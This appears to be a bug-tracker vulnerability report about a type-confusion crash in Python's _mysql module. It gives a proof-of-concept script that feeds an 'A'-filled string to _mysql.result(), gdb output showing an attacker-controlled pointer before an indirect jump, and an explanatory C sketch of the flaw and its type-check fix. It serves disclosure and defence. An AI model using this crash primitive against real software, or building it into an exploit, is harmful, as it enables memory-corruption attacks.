
Author: zeroinside
Recipients: zeroinside
Date: 2017-01-04 11:26:33
SpamBayes Score: -1.0
Marked as misclassified: Yes
Message-id: <1483529194.23.0.906683794217.issue29150@psf.upfronthosting.co.za>
In-reply-to:
Content:
Hello.
I found a vulnerability in the _mysql module.
PoC below:
#!/usr/bin/python2.7
import _mysql
# second argument to _mysql.result(); it is sitting in rdx at the crash site below
RDX=0x66666666
# 2048 bytes of 'A' (0x41); at the crash below rax holds 0x4141414141414141 read from this buffer
payload="A"*2048
_mysql.result(payload,RDX)


It's an exploitable bug; I'm working on an exploit.
(gdb) run mysql.py 
Starting program: /usr/bin/python2.7 mysql.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff38e7f3c in mysql_use_result () from /usr/lib/libmysqlclient.so.18
(gdb) info reg
rax            0x4141414141414141       4702111234474983745
rbx            0x7ffff7e91b90   140737352637328
rcx            0x0      0
rdx            0x66666666       1717986918
rsi            0x7ffff7eb1ec0   140737352769216
rdi            0x5555557f9890   93824995006608
rbp            0x7fffffffe120   0x7fffffffe120
rsp            0x7fffffffe0a8   0x7fffffffe0a8
r8             0x7fffffffdd00   140737488346368
r9             0x7fffffffdd80   140737488346496
r10            0x5555557824f0   93824994518256
r11            0x2      2
r12            0x5555557560a0   93824994336928
r13            0x0      0
r14            0x7ffff7e939c7   140737352645063
r15            0x7ffff7e91b90   140737352637328
rip            0x7ffff38e7f3c   0x7ffff38e7f3c <mysql_use_result+12>
eflags         0x10206  [ PF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) disas $rip
Dump of assembler code for function mysql_use_result:
   0x00007ffff38e7f30 <+0>:     push   %rbp
   0x00007ffff38e7f31 <+1>:     mov    0x4d0(%rdi),%rax
   0x00007ffff38e7f38 <+8>:     mov    %rsp,%rbp
   0x00007ffff38e7f3b <+11>:    pop    %rbp
=> 0x00007ffff38e7f3c <+12>:    mov    0x18(%rax),%rax
   0x00007ffff38e7f40 <+16>:    jmpq   *%rax
End of assembler dump.
(gdb)
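The dump above is consistent with a type confusion: the bytes of the string passed as the first argument are read through a pointer as if they were a connection structure. rax is loaded from 0x4d0(%rdi), ends up holding 0x4141414141414141, and the fault is the dereference at 0x18(%rax); the `jmpq *%rax` two instructions later is why the report calls the bug exploitable, although that jump is only reached if the intermediate load lands in mapped memory, which a bare 0x4141414141414141 does not. The following C program is an added illustration of that pattern and is not code from the report or from MySQLdb: the object model, struct layouts, field names and the `make_payload`/`make_connection`/`peek_methods_unchecked`/`use_result_checked` functions are all hypothetical, chosen so that the unchecked path reproduces the same 0x41-filled pointer value seen in rax, and the checked path shows the type test that stops it.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical object model (not MySQLdb's): every object starts with a
   type tag, and a constructor receives a generic object pointer. */
typedef enum { TYPE_STRING = 1, TYPE_CONNECTION = 2 } obj_type_t;

typedef struct {
    uint64_t type;              /* 8 bytes, so both layouts put their body at offset 8 */
} object_t;

/* Method table reached through a pointer: the analogue of
   mov 0x4d0(%rdi),%rax / mov 0x18(%rax),%rax / jmpq *%rax in the dump. */
typedef struct {
    int (*use_result)(void);
} methods_t;

typedef struct {
    object_t base;
    methods_t *methods;         /* what a genuine connection holds at this offset */
} connection_t;

typedef struct {
    object_t base;
    char data[2048];            /* a 2048-byte string body, like "A"*2048 in the PoC */
} string_t;

static int fake_use_result(void) { return 42; }
static methods_t g_methods = { fake_use_result };
static connection_t g_conn;
static string_t g_payload;

/* Constructed inputs: a genuine connection object and the PoC's string. */
object_t *make_connection(void) {
    g_conn.base.type = TYPE_CONNECTION;
    g_conn.methods = &g_methods;
    return &g_conn.base;
}

object_t *make_payload(void) {
    g_payload.base.type = TYPE_STRING;
    memset(g_payload.data, 'A', sizeof g_payload.data);   /* 0x41 bytes, as in the PoC */
    return &g_payload.base;
}

/* Unchecked: cast whatever arrived to a connection and read the method
   pointer. Returns the pointer value instead of jumping through it, so the
   string case yields the same 0x4141414141414141 that rax holds in the
   report instead of segfaulting here. */
uintptr_t peek_methods_unchecked(object_t *obj) {
    connection_t *conn = (connection_t *)obj;   /* type confusion: no tag check */
    return (uintptr_t)conn->methods;
}

/* Checked: verify the type tag before the cast, which is what a CPython
   extension gets from the "O!" PyArg_ParseTuple format or an explicit type
   check. Returns -1 on a wrong type, otherwise the method's result. */
int use_result_checked(object_t *obj) {
    if (obj == NULL || obj->type != TYPE_CONNECTION)
        return -1;
    connection_t *conn = (connection_t *)obj;
    return conn->methods->use_result();
}

int main(void) {
    printf("unchecked, string arg: methods pointer = 0x%llx\n",
           (unsigned long long)peek_methods_unchecked(make_payload()));
    printf("checked, string arg:   %d (rejected)\n", use_result_checked(make_payload()));
    printf("checked, connection:   %d\n", use_result_checked(make_connection()));
    return 0;
}
```

With a real connection the checked path calls through the method table and returns 42; with the string it returns -1 before any cast, whereas the unchecked path hands back a pointer assembled from the string's own bytes, which is exactly the value that would be dereferenced next.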
History
Date                 User        Action         Args
2017-01-04 11:26:34  zeroinside  setrecipients  + zeroinside
2017-01-04 11:26:34  zeroinside  setmessageid   <1483529194.23.0.906683794217.issue29150@psf.upfronthosting.co.za>
2017-01-04 11:26:34  zeroinside  link           issue29150 messages
2017-01-04 11:26:33  zeroinside  create